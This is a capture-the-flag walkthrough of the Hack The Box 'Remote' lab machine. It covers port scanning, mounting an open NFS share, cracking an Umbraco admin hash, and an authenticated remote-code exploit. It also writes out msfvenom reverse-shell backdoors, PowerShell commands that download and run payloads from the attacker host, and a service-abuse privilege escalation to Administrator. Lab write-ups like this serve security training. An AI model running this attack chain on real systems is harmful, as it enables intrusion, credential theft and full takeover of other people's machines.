Nmap Result
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-25 18:02 CEST
Nmap scan report for remote.htb (10.10.10.180)
Host is up (0.061s latency).
Not shown: 65520 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 5m12s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-07-25T16:19:27
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 738.36 seconds
Information Gathering
I saw rpc that exposes a nfs service. Let's enumerate that
showmount --exports 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
Okay, I see that everyone can mount that directory. Let's do that.
sudo mount -t nfs 10.10.10.180:/site_backups /home/jack/htb/remote/site_backups_mount/
Inside of it there are some configuration about the web service that are providing. It's called umbraco. Let's get some hashes
grep -roE "([\" \'{\[\=]){0,1}(([a-f0-9]){128}|([a-f0-9]){96}|([a-f0-9]){64}|([a-f0-9]){40}|([a-f0-9]){32})([\" \'}\]\,]){0,1}" -a ./*
The only one that I found interesting was /App_Data/Umbraco.sdf
, basically it contains a compact relational database saved in the SQL Server Compact (SQL CE) format. I saw that this hash is related to the Umbraco's admin credentials. admin@local.htb
The hash was b8be16afba8c314ad33d812f22a04991b90e2aaa
so I used Jack Hash Finder to find the original password.
./jhf b8be16afba8c314ad33d812f22a04991b90e2aaa
b8be16afba8c314ad33d812f22a04991b90e2aaa: baconandcheese
Gaining Access
I saw that the webservice is vulnerabile, so I use this exploit Ubraco-RCE
But first of all, I made two reverse shell using Metasploit using two different port. I'll explain why later.
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.14.175 LPORT=9999 -b "\x00" -e x86/shikata_ga_nai -f exe -o ~/htb/remote/backdoor0.exe
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.14.175 LPORT=8888 -b "\x00" -e x86/shikata_ga_nai -f exe -o ~/htb/remote/backdoor1.exe
Also, we need to get ready to do the privilege escalation, so we will download PowerUp.ps1
We need to fire up a webserver so we can download the backdoors to the target machine. We can achive this by using python. Get into the folder where the backdoors and the PS1 script is and execute the following command:
python3 -m http.server 8080
Now we're ready to use the exploit.
Open up the reverse shell handler
msfconsole -x "use exploit/multi/handler; set payload windows/shell/reverse_tcp; set LPORT 9999; set LHOST 10.10.14.175; run"
Download the backdoor on the target machine.
python3 exploit.py -u admin@htb.local -p baconandcheese -i http://remote.htb/ -c powershell.exe -a "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.175:8080/backdoor0.exe', '/Windows/TEMP/backdoor0.exe')"
Execute the backdoor
python3 exploit.py -u admin@htb.local -p baconandcheese -i http://remote.htb/ -c powershell.exe -a "/Windows/TEMP/backdoor0.exe"
Now we got access to the machine!
We can retreive the flag by entering the following command:
more \Users\Public\user.txt
Privilege Escalation
Now we want to have a PowerShell prompt, since we need to use our PowerUp.ps1 module. After that, we're gonna load the module and execute the function to get all the information we need.
Get the PowerShell prompt:
powershell.exe -nop -exec bypass
Downloading PowerUp.ps1
(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.175:8080/PowerUp.ps1', '/Windows/TEMP/PowerUp.ps1')
Downloading the second backdoor:
(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.175:8080/backdoor1.exe', '/Windows/TEMP/backdoor1.exe')
Now we're ready to try privesc. Execute the following command to activate the PowerUp module and then execute the Invoke-AllChecks:
Import-Module /Windows/TEMP/PowerUp.ps1
Invoke-AllChecks
The module will start to do some checks and eventually, we find a way:
ServiceName : UsoSvc
Path : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -ServiceName 'UsoSvc'
Do you remember the second backdoor that we generated? It's time to use it.
We're gonna execute the second with high privileges.
Create a new reverse shell handler:
msfconsole -x "use exploit/multi/handler; set payload windows/shell/reverse_tcp; set LPORT 8888; set LHOST 10.10.14.175; run"
Execute the second backdoor by doing privesc in our current reverse shell:
Invoke-ServiceAbuse -ServiceName 'UsoSvc' /Windows/TEMP/backdoor1.exe
Done! We got Administrator permission on our second reverse shell! That's great.
Now we can read the flag:
more \Users\Administrator\Desktop\root.txt